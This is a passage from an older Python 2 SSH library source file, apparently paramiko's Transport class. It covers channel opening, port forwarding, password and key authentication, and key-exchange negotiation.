@param filename: optional path to the moduli file, if you happen to
know that it's not in a standard location.
@type filename: str
@return: True if a moduli file was successfully loaded; False
otherwise.
@rtype: bool
@note: This has no effect when used in client mode.
"""
Transport._modulus_pack = ModulusPack(rng)
# places to look for the openssh "moduli" file
file_list = [ '/etc/ssh/moduli', '/usr/local/etc/moduli' ]
if filename is not None:
file_list.insert(0, filename)
for fn in file_list:
try:
Transport._modulus_pack.read_file(fn)
return True
except IOError:
pass
# none succeeded
Transport._modulus_pack = None
return False
load_server_moduli = staticmethod(load_server_moduli)
def close(self):
"""
Close this session, and any open channels that are tied to it.
"""
if not self.active:
return
self.active = False
self.packetizer.close()
self.join()
for chan in self._channels.values():
chan._unlink()
def get_remote_server_key(self):
"""
Return the host key of the server (in client mode).
@note: Previously this call returned a tuple of (key type, key string).
You can get the same effect by calling
L{PKey.get_name <pkey.PKey.get_name>} for the key type, and
C{str(key)} for the key string.
@raise SSHException: if no session is currently active.
@return: public key of the remote server
@rtype: L{PKey <pkey.PKey>}
"""
if (not self.active) or (not self.initial_kex_done):
raise SSHException('No existing session')
return self.host_key
def is_active(self):
"""
Return true if this session is active (open).
@return: True if the session is still active (open); False if the
session is closed
@rtype: bool
"""
return self.active
def open_session(self):
"""
Request a new channel to the server, of type C{"session"}. This
is just an alias for C{open_channel('session')}.
@return: a new L{Channel}
@rtype: L{Channel}
@raise SSHException: if the request is rejected or the session ends
prematurely
"""
return self.open_channel('session')
def open_x11_channel(self, src_addr=None):
"""
Request a new channel to the client, of type C{"x11"}. This
is just an alias for C{open_channel('x11', src_addr=src_addr)}.
@param src_addr: the source address of the x11 server (port is the
x11 port, ie. 6010)
@type src_addr: (str, int)
@return: a new L{Channel}
@rtype: L{Channel}
@raise SSHException: if the request is rejected or the session ends
prematurely
"""
return self.open_channel('x11', src_addr=src_addr)
def open_forward_agent_channel(self):
"""
Request a new channel to the client, of type
C{"auth-agent@openssh.com"}.
This is just an alias for C{open_channel('auth-agent@openssh.com')}.
@return: a new L{Channel}
@rtype: L{Channel}
@raise SSHException: if the request is rejected or the session ends
prematurely
"""
return self.open_channel('auth-agent@openssh.com')
def open_forwarded_tcpip_channel(self, (src_addr, src_port), (dest_addr, dest_port)):
"""
Request a new channel back to the client, of type C{"forwarded-tcpip"}.
This is used after a client has requested port forwarding, for sending
incoming connections back to the client.
@param src_addr: originator's address
@param src_port: originator's port
@param dest_addr: local (server) connected address
@param dest_port: local (server) connected port
"""
return self.open_channel('forwarded-tcpip', (dest_addr, dest_port), (src_addr, src_port))
def open_channel(self, kind, dest_addr=None, src_addr=None):
"""
Request a new channel to the server. L{Channel}s are socket-like
objects used for the actual transfer of data across the session.
You may only request a channel after negotiating encryption (using
L{connect} or L{start_client}) and authenticating.
@param kind: the kind of channel requested (usually C{"session"},
C{"forwarded-tcpip"}, C{"direct-tcpip"}, or C{"x11"})
@type kind: str
@param dest_addr: the destination address of this port forwarding,
if C{kind} is C{"forwarded-tcpip"} or C{"direct-tcpip"} (ignored
for other channel types)
@type dest_addr: (str, int)
@param src_addr: the source address of this port forwarding, if
C{kind} is C{"forwarded-tcpip"}, C{"direct-tcpip"}, or C{"x11"}
@type src_addr: (str, int)
@return: a new L{Channel} on success
@rtype: L{Channel}
@raise SSHException: if the request is rejected or the session ends
prematurely
"""
if not self.active:
raise SSHException('SSH session not active')
self.lock.acquire()
try:
chanid = self._next_channel()
m = Message()
m.add_byte(chr(MSG_CHANNEL_OPEN))
m.add_string(kind)
m.add_int(chanid)
m.add_int(self.window_size)
m.add_int(self.max_packet_size)
if (kind == 'forwarded-tcpip') or (kind == 'direct-tcpip'):
m.add_string(dest_addr[0])
m.add_int(dest_addr[1])
m.add_string(src_addr[0])
m.add_int(src_addr[1])
elif kind == 'x11':
m.add_string(src_addr[0])
m.add_int(src_addr[1])
chan = Channel(chanid)
self._channels.put(chanid, chan)
self.channel_events[chanid] = event = threading.Event()
self.channels_seen[chanid] = True
chan._set_transport(self)
chan._set_window(self.window_size, self.max_packet_size)
finally:
self.lock.release()
self._send_user_message(m)
while True:
event.wait(0.1);
if not self.active:
e = self.get_exception()
if e is None:
e = SSHException('Unable to open channel.')
raise e
if event.isSet():
break
chan = self._channels.get(chanid)
if chan is not None:
return chan
e = self.get_exception()
if e is None:
e = SSHException('Unable to open channel.')
raise e
def request_port_forward(self, address, port, handler=None):
"""
Ask the server to forward TCP connections from a listening port on
the server, across this SSH session.
If a handler is given, that handler is called from a different thread
whenever a forwarded connection arrives. The handler parameters are::
handler(channel, (origin_addr, origin_port), (server_addr, server_port))
where C{server_addr} and C{server_port} are the address and port that
the server was listening on.
If no handler is set, the default behavior is to send new incoming
forwarded connections into the accept queue, to be picked up via
L{accept}.
@param address: the address to bind when forwarding
@type address: str
@param port: the port to forward, or 0 to ask the server to allocate
any port
@type port: int
@param handler: optional handler for incoming forwarded connections
@type handler: function(Channel, (str, int), (str, int))
@return: the port # allocated by the server
@rtype: int
@raise SSHException: if the server refused the TCP forward request
"""
if not self.active:
raise SSHException('SSH session not active')
address = str(address)
port = int(port)
response = self.global_request('tcpip-forward', (address, port), wait=True)
if response is None:
raise SSHException('TCP forwarding request denied')
if port == 0:
port = response.get_int()
if handler is None:
def default_handler(channel, (src_addr, src_port), (dest_addr, dest_port)):
self._queue_incoming_channel(channel)
handler = default_handler
self._tcp_handler = handler
return port
def cancel_port_forward(self, address, port):
"""
Ask the server to cancel a previous port-forwarding request. No more
connections to the given address & port will be forwarded across this
ssh connection.
@param address: the address to stop forwarding
@type address: str
@param port: the port to stop forwarding
@type port: int
"""
if not self.active:
return
self._tcp_handler = None
self.global_request('cancel-tcpip-forward', (address, port), wait=True)
def open_sftp_client(self):
"""
Create an SFTP client channel from an open transport. On success,
an SFTP session will be opened with the remote host, and a new
SFTPClient object will be returned.
@return: a new L{SFTPClient} object, referring to an sftp session
(channel) across this transport
@rtype: L{SFTPClient}
"""
return SFTPClient.from_transport(self)
def send_ignore(self, bytes=None):
"""
Send a junk packet across the encrypted link. This is sometimes used
to add "noise" to a connection to confuse would-be attackers. It can
also be used as a keep-alive for long lived connections traversing
firewalls.
@param bytes: the number of random bytes to send in the payload of the
ignored packet -- defaults to a random number from 10 to 41.
@type bytes: int
"""
m = Message()
m.add_byte(chr(MSG_IGNORE))
if bytes is None:
bytes = (ord(rng.read(1)) % 32) + 10
m.add_bytes(rng.read(bytes))
self._send_user_message(m)
def renegotiate_keys(self):
"""
Force this session to switch to new keys. Normally this is done
automatically after the session hits a certain number of packets or
bytes sent or received, but this method gives you the option of forcing
new keys whenever you want. Negotiating new keys causes a pause in
traffic both ways as the two sides swap keys and do computations. This
method returns when the session has switched to new keys.
@raise SSHException: if the key renegotiation failed (which causes the
session to end)
"""
self.completion_event = threading.Event()
self._send_kex_init()
while True:
self.completion_event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException('Negotiation failed.')
if self.completion_event.isSet():
break
return
def set_keepalive(self, interval):
"""
Turn on/off keepalive packets (default is off). If this is set, after
C{interval} seconds without sending any data over the connection, a
"keepalive" packet will be sent (and ignored by the remote host). This
can be useful to keep connections alive over a NAT, for example.
@param interval: seconds to wait before sending a keepalive packet (or
0 to disable keepalives).
@type interval: int
"""
self.packetizer.set_keepalive(interval,
lambda x=weakref.proxy(self): x.global_request('keepalive@lag.net', wait=False))
def global_request(self, kind, data=None, wait=True):
"""
Make a global request to the remote host. These are normally
extensions to the SSH2 protocol.
@param kind: name of the request.
@type kind: str
@param data: an optional tuple containing additional data to attach
to the request.
@type data: tuple
@param wait: C{True} if this method should not return until a response
is received; C{False} otherwise.
@type wait: bool
@return: a L{Message} containing possible additional data if the
request was successful (or an empty L{Message} if C{wait} was
C{False}); C{None} if the request was denied.
@rtype: L{Message}
"""
if wait:
self.completion_event = threading.Event()
m = Message()
m.add_byte(chr(MSG_GLOBAL_REQUEST))
m.add_string(kind)
m.add_boolean(wait)
if data is not None:
m.add(*data)
self._log(DEBUG, 'Sending global request "%s"' % kind)
self._send_user_message(m)
if not wait:
return None
while True:
self.completion_event.wait(0.1)
if not self.active:
return None
if self.completion_event.isSet():
break
return self.global_response
def accept(self, timeout=None):
"""
Return the next channel opened by the client over this transport, in
server mode. If no channel is opened before the given timeout, C{None}
is returned.
@param timeout: seconds to wait for a channel, or C{None} to wait
forever
@type timeout: int
@return: a new Channel opened by the client
@rtype: L{Channel}
"""
self.lock.acquire()
try:
if len(self.server_accepts) > 0:
chan = self.server_accepts.pop(0)
else:
self.server_accept_cv.wait(timeout)
if len(self.server_accepts) > 0:
chan = self.server_accepts.pop(0)
else:
# timeout
chan = None
finally:
self.lock.release()
return chan
def connect(self, hostkey=None, username='', password=None, pkey=None):
"""
Negotiate an SSH2 session, and optionally verify the server's host key
and authenticate using a password or private key. This is a shortcut
for L{start_client}, L{get_remote_server_key}, and
L{Transport.auth_password} or L{Transport.auth_publickey}. Use those
methods if you want more control.
You can use this method immediately after creating a Transport to
negotiate encryption with a server. If it fails, an exception will be
thrown. On success, the method will return cleanly, and an encrypted
session exists. You may immediately call L{open_channel} or
L{open_session} to get a L{Channel} object, which is used for data
transfer.
@note: If you fail to supply a password or private key, this method may
succeed, but a subsequent L{open_channel} or L{open_session} call may
fail because you haven't authenticated yet.
@param hostkey: the host key expected from the server, or C{None} if
you don't want to do host key verification.
@type hostkey: L{PKey<pkey.PKey>}
@param username: the username to authenticate as.
@type username: str
@param password: a password to use for authentication, if you want to
use password authentication; otherwise C{None}.
@type password: str
@param pkey: a private key to use for authentication, if you want to
use private key authentication; otherwise C{None}.
@type pkey: L{PKey<pkey.PKey>}
@raise SSHException: if the SSH2 negotiation fails, the host key
supplied by the server is incorrect, or authentication fails.
"""
if hostkey is not None:
self._preferred_keys = [ hostkey.get_name() ]
self.start_client()
# check host key if we were given one
if (hostkey is not None):
key = self.get_remote_server_key()
if (key.get_name() != hostkey.get_name()) or (str(key) != str(hostkey)):
self._log(DEBUG, 'Bad host key from server')
self._log(DEBUG, 'Expected: %s: %s' % (hostkey.get_name(), repr(str(hostkey))))
self._log(DEBUG, 'Got : %s: %s' % (key.get_name(), repr(str(key))))
raise SSHException('Bad host key from server')
self._log(DEBUG, 'Host key verified (%s)' % hostkey.get_name())
if (pkey is not None) or (password is not None):
if password is not None:
self._log(DEBUG, 'Attempting password auth...')
self.auth_password(username, password)
else:
self._log(DEBUG, 'Attempting public-key auth...')
self.auth_publickey(username, pkey)
return
def get_exception(self):
"""
Return any exception that happened during the last server request.
This can be used to fetch more specific error information after using
calls like L{start_client}. The exception (if any) is cleared after
this call.
@return: an exception, or C{None} if there is no stored exception.
@rtype: Exception
@since: 1.1
"""
self.lock.acquire()
try:
e = self.saved_exception
self.saved_exception = None
return e
finally:
self.lock.release()
def set_subsystem_handler(self, name, handler, *larg, **kwarg):
"""
Set the handler class for a subsystem in server mode. If a request
for this subsystem is made on an open ssh channel later, this handler
will be constructed and called -- see L{SubsystemHandler} for more
detailed documentation.
Any extra parameters (including keyword arguments) are saved and
passed to the L{SubsystemHandler} constructor later.
@param name: name of the subsystem.
@type name: str
@param handler: subclass of L{SubsystemHandler} that handles this
subsystem.
@type handler: class
"""
try:
self.lock.acquire()
self.subsystem_table[name] = (handler, larg, kwarg)
finally:
self.lock.release()
def is_authenticated(self):
"""
Return true if this session is active and authenticated.
@return: True if the session is still open and has been authenticated
successfully; False if authentication failed and/or the session is
closed.
@rtype: bool
"""
return self.active and (self.auth_handler is not None) and self.auth_handler.is_authenticated()
def get_username(self):
"""
Return the username this connection is authenticated for. If the
session is not authenticated (or authentication failed), this method
returns C{None}.
@return: username that was authenticated, or C{None}.
@rtype: string
"""
if not self.active or (self.auth_handler is None):
return None
return self.auth_handler.get_username()
def auth_none(self, username):
"""
Try to authenticate to the server using no authentication at all.
This will almost always fail. It may be useful for determining the
list of authentication types supported by the server, by catching the
L{BadAuthenticationType} exception raised.
@param username: the username to authenticate as
@type username: string
@return: list of auth types permissible for the next stage of
authentication (normally empty)
@rtype: list
@raise BadAuthenticationType: if "none" authentication isn't allowed
by the server for this user
@raise SSHException: if the authentication failed due to a network
error
@since: 1.5
"""
if (not self.active) or (not self.initial_kex_done):
raise SSHException('No existing session')
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_none(username, my_event)
return self.auth_handler.wait_for_response(my_event)
def auth_password(self, username, password, event=None, fallback=True):
"""
Authenticate to the server using a password. The username and password
are sent over an encrypted link.
If an C{event} is passed in, this method will return immediately, and
the event will be triggered once authentication succeeds or fails. On
success, L{is_authenticated} will return C{True}. On failure, you may
use L{get_exception} to get more detailed error information.
Since 1.1, if no event is passed, this method will block until the
authentication succeeds or fails. On failure, an exception is raised.
Otherwise, the method simply returns.
Since 1.5, if no event is passed and C{fallback} is C{True} (the
default), if the server doesn't support plain password authentication
but does support so-called "keyboard-interactive" mode, an attempt
will be made to authenticate using this interactive mode. If it fails,
the normal exception will be thrown as if the attempt had never been
made. This is useful for some recent Gentoo and Debian distributions,
which turn off plain password authentication in a misguided belief
that interactive authentication is "more secure". (It's not.)
If the server requires multi-step authentication (which is very rare),
this method will return a list of auth types permissible for the next
step. Otherwise, in the normal case, an empty list is returned.
@param username: the username to authenticate as
@type username: str
@param password: the password to authenticate with
@type password: str or unicode
@param event: an event to trigger when the authentication attempt is
complete (whether it was successful or not)
@type event: threading.Event
@param fallback: C{True} if an attempt at an automated "interactive"
password auth should be made if the server doesn't support normal
password auth
@type fallback: bool
@return: list of auth types permissible for the next stage of
authentication (normally empty)
@rtype: list
@raise BadAuthenticationType: if password authentication isn't
allowed by the server for this user (and no event was passed in)
@raise AuthenticationException: if the authentication failed (and no
event was passed in)
@raise SSHException: if there was a network error
"""
if (not self.active) or (not self.initial_kex_done):
# we should never try to send the password unless we're on a secure link
raise SSHException('No existing session')
if event is None:
my_event = threading.Event()
else:
my_event = event
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_password(username, password, my_event)
if event is not None:
# caller wants to wait for event themselves
return []
try:
return self.auth_handler.wait_for_response(my_event)
except BadAuthenticationType, x:
# if password auth isn't allowed, but keyboard-interactive *is*, try to fudge it
if not fallback or ('keyboard-interactive' not in x.allowed_types):
raise
try:
def handler(title, instructions, fields):
if len(fields) > 1:
raise SSHException('Fallback authentication failed.')
if len(fields) == 0:
# for some reason, at least on os x, a 2nd request will
# be made with zero fields requested. maybe it's just
# to try to fake out automated scripting of the exact
# type we're doing here. *shrug* :)
return []
return [ password ]
return self.auth_interactive(username, handler)
except SSHException, ignored:
# attempt failed; just raise the original exception
raise x
return None
def auth_publickey(self, username, key, event=None):
"""
Authenticate to the server using a private key. The key is used to
sign data from the server, so it must include the private part.
If an C{event} is passed in, this method will return immediately, and
the event will be triggered once authentication succeeds or fails. On
success, L{is_authenticated} will return C{True}. On failure, you may
use L{get_exception} to get more detailed error information.
Since 1.1, if no event is passed, this method will block until the
authentication succeeds or fails. On failure, an exception is raised.
Otherwise, the method simply returns.
If the server requires multi-step authentication (which is very rare),
this method will return a list of auth types permissible for the next
step. Otherwise, in the normal case, an empty list is returned.
@param username: the username to authenticate as
@type username: string
@param key: the private key to authenticate with
@type key: L{PKey <pkey.PKey>}
@param event: an event to trigger when the authentication attempt is
complete (whether it was successful or not)
@type event: threading.Event
@return: list of auth types permissible for the next stage of
authentication (normally empty)
@rtype: list
@raise BadAuthenticationType: if public-key authentication isn't
allowed by the server for this user (and no event was passed in)
@raise AuthenticationException: if the authentication failed (and no
event was passed in)
@raise SSHException: if there was a network error
"""
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException('No existing session')
if event is None:
my_event = threading.Event()
else:
my_event = event
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_publickey(username, key, my_event)
if event is not None:
# caller wants to wait for event themselves
return []
return self.auth_handler.wait_for_response(my_event)
def auth_interactive(self, username, handler, submethods=''):
"""
Authenticate to the server interactively. A handler is used to answer
arbitrary questions from the server. On many servers, this is just a
dumb wrapper around PAM.
This method will block until the authentication succeeds or fails,
peroidically calling the handler asynchronously to get answers to
authentication questions. The handler may be called more than once
if the server continues to ask questions.
The handler is expected to be a callable that will handle calls of the
form: C{handler(title, instructions, prompt_list)}. The C{title} is
meant to be a dialog-window title, and the C{instructions} are user
instructions (both are strings). C{prompt_list} will be a list of
prompts, each prompt being a tuple of C{(str, bool)}. The string is
the prompt and the boolean indicates whether the user text should be
echoed.
A sample call would thus be:
C{handler('title', 'instructions', [('Password:', False)])}.
The handler should return a list or tuple of answers to the server's
questions.
If the server requires multi-step authentication (which is very rare),
this method will return a list of auth types permissible for the next
step. Otherwise, in the normal case, an empty list is returned.
@param username: the username to authenticate as
@type username: string
@param handler: a handler for responding to server questions
@type handler: callable
@param submethods: a string list of desired submethods (optional)
@type submethods: str
@return: list of auth types permissible for the next stage of
authentication (normally empty).
@rtype: list
@raise BadAuthenticationType: if public-key authentication isn't
allowed by the server for this user
@raise AuthenticationException: if the authentication failed
@raise SSHException: if there was a network error
@since: 1.5
"""
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException('No existing session')
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_interactive(username, handler, my_event, submethods)
return self.auth_handler.wait_for_response(my_event)
def set_log_channel(self, name):
"""
Set the channel for this transport's logging. The default is
C{"ssh.transport"} but it can be set to anything you want.
(See the C{logging} module for more info.) SSH Channels will log
to a sub-channel of the one specified.
@param name: new channel name for logging
@type name: str
@since: 1.1
"""
self.log_name = name
self.logger = util.get_logger(name)
self.packetizer.set_log(self.logger)
def get_log_channel(self):
"""
Return the channel name used for this transport's logging.
@return: channel name.
@rtype: str
@since: 1.2
"""
return self.log_name
def set_hexdump(self, hexdump):
"""
Turn on/off logging a hex dump of protocol traffic at DEBUG level in
the logs. Normally you would want this off (which is the default),
but if you are debugging something, it may be useful.
@param hexdump: C{True} to log protocol traffix (in hex) to the log;
C{False} otherwise.
@type hexdump: bool
"""
self.packetizer.set_hexdump(hexdump)
def get_hexdump(self):
"""
Return C{True} if the transport is currently logging hex dumps of
protocol traffic.
@return: C{True} if hex dumps are being logged
@rtype: bool
@since: 1.4
"""
return self.packetizer.get_hexdump()
def use_compression(self, compress=True):
"""
Turn on/off compression. This will only have an affect before starting
the transport (ie before calling L{connect}, etc). By default,
compression is off since it negatively affects interactive sessions.
@param compress: C{True} to ask the remote client/server to compress
traffic; C{False} to refuse compression
@type compress: bool
@since: 1.5.2
"""
if compress:
self._preferred_compression = ( 'zlib@openssh.com', 'zlib', 'none' )
else:
self._preferred_compression = ( 'none', )
def getpeername(self):
"""
Return the address of the remote side of this Transport, if possible.
This is effectively a wrapper around C{'getpeername'} on the underlying
socket. If the socket-like object has no C{'getpeername'} method,
then C{("unknown", 0)} is returned.
@return: the address if the remote host, if known
@rtype: tuple(str, int)
"""
gp = getattr(self.sock, 'getpeername', None)
if gp is None:
return ('unknown', 0)
return gp()
def stop_thread(self):
self.active = False
self.packetizer.close()
### internals...
def _log(self, level, msg, *args):
if issubclass(type(msg), list):
for m in msg:
self.logger.log(level, m)
else:
self.logger.log(level, msg, *args)
def _get_modulus_pack(self):
"used by KexGex to find primes for group exchange"
return self._modulus_pack
def _next_channel(self):
"you are holding the lock"
chanid = self._channel_counter
while self._channels.get(chanid) is not None:
self._channel_counter = (self._channel_counter + 1) & 0xffffff
chanid = self._channel_counter
self._channel_counter = (self._channel_counter + 1) & 0xffffff
return chanid
def _unlink_channel(self, chanid):
"used by a Channel to remove itself from the active channel list"
self._channels.delete(chanid)
def _send_message(self, data):
self.packetizer.send_message(data)
def _send_user_message(self, data):
"""
send a message, but block if we're in key negotiation. this is used
for user-initiated requests.
"""
start = time.time()
while True:
self.clear_to_send.wait(0.1)
if not self.active:
self._log(DEBUG, 'Dropping user packet because connection is dead.')
return
self.clear_to_send_lock.acquire()
if self.clear_to_send.isSet():
break
self.clear_to_send_lock.release()
if time.time() > start + self.clear_to_send_timeout:
raise SSHException('Key-exchange timed out waiting for key negotiation')
try:
self._send_message(data)
finally:
self.clear_to_send_lock.release()
def _set_K_H(self, k, h):
"used by a kex object to set the K (root key) and H (exchange hash)"
self.K = k
self.H = h
if self.session_id == None:
self.session_id = h
def _expect_packet(self, *ptypes):
"used by a kex object to register the next packet type it expects to see"
self._expected_packet = tuple(ptypes)
def _verify_key(self, host_key, sig):
key = self._key_info[self.host_key_type](Message(host_key))
if key is None:
raise SSHException('Unknown host key type')
if not key.verify_ssh_sig(self.H, Message(sig)):
raise SSHException('Signature verification (%s) failed.' % self.host_key_type)
self.host_key = key
def _compute_key(self, id, nbytes):
"id is 'A' - 'F' for the various keys used by ssh"
m = Message()
m.add_mpint(self.K)
m.add_bytes(self.H)
m.add_byte(id)
m.add_bytes(self.session_id)
out = sofar = SHA.new(str(m)).digest()
while len(out) < nbytes:
m = Message()
m.add_mpint(self.K)
m.add_bytes(self.H)
m.add_bytes(sofar)
digest = SHA.new(str(m)).digest()
out += digest
sofar += digest
return out[:nbytes]
def _get_cipher(self, name, key, iv):
if name not in self._cipher_info:
raise SSHException('Unknown client cipher ' + name)
if name in ('arcfour128', 'arcfour256'):
# arcfour cipher
cipher = self._cipher_info[name]['class'].new(key)
# as per RFC 4345, the first 1536 bytes of keystream
# generated by the cipher MUST be discarded
cipher.encrypt(" " * 1536)
return cipher
elif name.endswith("-ctr"):
# CTR modes, we need a counter
counter = Counter.new(nbits=self._cipher_info[name]['block-size'] * 8, initial_value=util.inflate_long(iv, True))
return self._cipher_info[name]['class'].new(key, self._cipher_info[name]['mode'], iv, counter)
else:
return self._cipher_info[name]['class'].new(key, self._cipher_info[name]['mode'], iv)
def _set_forward_agent_handler(self, handler):
if handler is None:
def default_handler(channel):
self._queue_incoming_channel(channel)
self._forward_agent_handler = default_handler
else:
self._forward_agent_handler = handler
def _set_x11_handler(self, handler):
# only called if a channel has turned on x11 forwarding
if handler is None:
# by default, use the same mechanism as accept()
def default_handler(channel, (src_addr, src_port)):
self._queue_incoming_channel(channel)
self._x11_handler = default_handler
else:
self._x11_handler = handler
def _queue_incoming_channel(self, channel):
self.lock.acquire()
try:
self.server_accepts.append(channel)
self.server_accept_cv.notify()
finally:
self.lock.release()
def run(self):
# (use the exposed "run" method, because if we specify a thread target
# of a private method, threading.Thread will keep a reference to it
# indefinitely, creating a GC cycle and not letting Transport ever be
# GC'd. it's a bug in Thread.)
# Hold reference to 'sys' so we can test sys.modules to detect
# interpreter shutdown.
self.sys = sys
# Required to prevent RNG errors when running inside many subprocess
# containers.
Random.atfork()
# active=True occurs before the thread is launched, to avoid a race
_active_threads.append(self)
if self.server_mode:
self._log(DEBUG, 'starting thread (server mode): %s' % hex(long(id(self)) & 0xffffffffL))
else:
self._log(DEBUG, 'starting thread (client mode): %s' % hex(long(id(self)) & 0xffffffffL))
try:
try:
self.packetizer.write_all(self.local_version + '\r\n')
self._check_banner()
self._send_kex_init()
self._expect_packet(MSG_KEXINIT)
while self.active:
if self.packetizer.need_rekey() and not self.in_kex:
self._send_kex_init()
try:
ptype, m = self.packetizer.read_message()
except NeedRekeyException:
continue
if ptype == MSG_IGNORE:
continue
elif ptype == MSG_DISCONNECT:
self._parse_disconnect(m)
self.active = False
self.packetizer.close()
break
elif ptype == MSG_DEBUG:
self._parse_debug(m)
continue
if len(self._expected_packet) > 0:
if ptype not in self._expected_packet:
raise SSHException('Expecting packet from %r, got %d' % (self._expected_packet, ptype))
self._expected_packet = tuple()
if (ptype >= 30) and (ptype <= 39):
self.kex_engine.parse_next(ptype, m)
continue
if ptype in self._handler_table:
self._handler_table[ptype](self, m)
elif ptype in self._channel_handler_table:
chanid = m.get_int()
chan = self._channels.get(chanid)
if chan is not None:
self._channel_handler_table[ptype](chan, m)
elif chanid in self.channels_seen:
self._log(DEBUG, 'Ignoring message for dead channel %d' % chanid)
else:
self._log(ERROR, 'Channel request for unknown channel %d' % chanid)
self.active = False
self.packetizer.close()
elif (self.auth_handler is not None) and (ptype in self.auth_handler._handler_table):
self.auth_handler._handler_table[ptype](self.auth_handler, m)
else:
self._log(WARNING, 'Oops, unhandled type %d' % ptype)
msg = Message()
msg.add_byte(chr(MSG_UNIMPLEMENTED))
msg.add_int(m.seqno)
self._send_message(msg)
except SSHException, e:
self._log(ERROR, 'Exception: ' + str(e))
self._log(ERROR, util.tb_strings())
self.saved_exception = e
except EOFError, e:
self._log(DEBUG, 'EOF in transport thread')
#self._log(DEBUG, util.tb_strings())
self.saved_exception = e
except socket.error, e:
if type(e.args) is tuple:
emsg = '%s (%d)' % (e.args[1], e.args[0])
else:
emsg = e.args
self._log(ERROR, 'Socket exception: ' + emsg)
self.saved_exception = e
except Exception, e:
self._log(ERROR, 'Unknown exception: ' + str(e))
self._log(ERROR, util.tb_strings())
self.saved_exception = e
_active_threads.remove(self)
for chan in self._channels.values():
chan._unlink()
if self.active:
self.active = False
self.packetizer.close()
if self.completion_event != None:
self.completion_event.set()
if self.auth_handler is not None:
self.auth_handler.abort()
for event in self.channel_events.values():
event.set()
try:
self.lock.acquire()
self.server_accept_cv.notify()
finally:
self.lock.release()
self.sock.close()
except:
# Don't raise spurious 'NoneType has no attribute X' errors when we
# wake up during interpreter shutdown. Or rather -- raise
# everything *if* sys.modules (used as a convenient sentinel)
# appears to still exist.
if self.sys.modules is not None:
raise
### protocol stages
def _negotiate_keys(self, m):
# throws SSHException on anything unusual
self.clear_to_send_lock.acquire()
try:
self.clear_to_send.clear()
finally:
self.clear_to_send_lock.release()
if self.local_kex_init == None:
# remote side wants to renegotiate
self._send_kex_init()
self._parse_kex_init(m)
self.kex_engine.start_kex()
def _check_banner(self):
# this is slow, but we only have to do it once
for i in range(100):
# give them 15 seconds for the first line, then just 2 seconds
# each additional line. (some sites have very high latency.)
if i == 0:
timeout = self.banner_timeout
else:
timeout = 2
try:
buf = self.packetizer.readline(timeout)
except Exception, x:
raise SSHException('Error reading SSH protocol banner' + str(x))
if buf[:4] == 'SSH-':
break
self._log(DEBUG, 'Banner: ' + buf)
if buf[:4] != 'SSH-':
raise SSHException('Indecipherable protocol version "' + buf + '"')
# save this server version string for later
self.remote_version = buf
# pull off any attached comment
comment = ''
i = string.find(buf, ' ')
if i >= 0:
comment = buf[i+1:]
buf = buf[:i]
# parse out version string and make sure it matches
segs = buf.split('-', 2)
if len(segs) < 3:
raise SSHException('Invalid SSH banner')
version = segs[1]
client = segs[2]
if version != '1.99' and version != '2.0':
raise SSHException('Incompatible version (%s instead of 2.0)' % (version,))
self._log(INFO, 'Connected (version %s, client %s)' % (version, client))
def _send_kex_init(self):
"""
announce to the other side that we'd like to negotiate keys, and what
kind of key negotiation we support.
"""
self.clear_to_send_lock.acquire()
try:
self.clear_to_send.clear()
finally:
self.clear_to_send_lock.release()
self.in_kex = True
if self.server_mode:
if (self._modulus_pack is None) and ('diffie-hellman-group-exchange-sha1' in self._preferred_kex):
# can't do group-exchange if we don't have a pack of potential primes
pkex = list(self.get_security_options().kex)
pkex.remove('diffie-hellman-group-exchange-sha1')
self.get_security_options().kex = pkex
available_server_keys = filter(self.server_key_dict.keys().__contains__,
self._preferred_keys)
else:
available_server_keys = self._preferred_keys
m = Message()
m.add_byte(chr(MSG_KEXINIT))
m.add_bytes(rng.read(16))
m.add_list(self._preferred_kex)
m.add_list(available_server_keys)
m.add_list(self._preferred_ciphers)
m.add_list(self._preferred_ciphers)
m.add_list(self._preferred_macs)
m.add_list(self._preferred_macs)
m.add_list(self._preferred_compression)
m.add_list(self._preferred_compression)
m.add_string('')
m.add_string('')
m.add_boolean(False)
m.add_int(0)
# save a copy for later (needed to compute a hash)
self.local_kex_init = str(m)
self._send_message(m)
def _parse_kex_init(self, m):
cookie = m.get_bytes(16)
kex_algo_list = m.get_list()
server_key_algo_list = m.get_list()
client_encrypt_algo_list = m.get_list()
server_encrypt_algo_list = m.get_list()
client_mac_algo_list = m.get_list()
server_mac_algo_list = m.get_list()
client_compress_algo_list = m.get_list()
server_compress_algo_list = m.get_list()
client_lang_list = m.get_list()
server_lang_list = m.get_list()
kex_follows = m.get_boolean()
unused = m.get_int()
self._log(DEBUG, 'kex algos:' + str(kex_algo_list) + ' server key:' + str(server_key_algo_list) + \
' client encrypt:' + str(client_encrypt_algo_list) + \
' server encrypt:' + str(server_encrypt_algo_list) + \
' client mac:' + str(client_mac_algo_list) + \
' server mac:' + str(server_mac_algo_list) + \
' client compress:' + str(client_compress_algo_list) + \
' server compress:' + str(server_compress_algo_list) + \
' client lang:' + str(client_lang_list) + \
' server lang:' + str(server_lang_list) + \
' kex follows?' + str(kex_follows))
# as a server, we pick the first item in the client's list that we support.
# as a client, we pick the first item in our list that the server supports.
if self.server_mode:
agreed_kex = filter(self._preferred_kex.__contains__, kex_algo_list)
else:
agreed_kex = filter(kex_algo_list.__contains__, self._preferred_kex)
if len(agreed_kex) == 0:
raise SSHException('Incompatible ssh peer (no acceptable kex algorithm)')
self.kex_engine = self._kex_info[agreed_kex[0]](self)
if self.server_mode:
available_server_keys = filter(self.server_key_dict.keys().__contains__,
self._preferred_keys)
agreed_keys = filter(available_server_keys.__contains__, server_key_algo_list)
else:
agreed_keys = filter(server_key_algo_list.__contains__, self._preferred_keys)
if len(agreed_keys) == 0:
raise SSHException('Incompatible ssh peer (no acceptable host key)')
self.host_key_type = agreed_keys[0]
if self.server_mode and (self.get_server_key() is None):
raise SSHException('Incompatible ssh peer (can\'t match requested host key type)')
if self.server_mode:
agreed_local_ciphers = filter(self._preferred_ciphers.__contains__,
server_encrypt_algo_list)
agreed_remote_ciphers = filter(self._preferred_ciphers.__contains__,
client_encrypt_algo_list)
else:
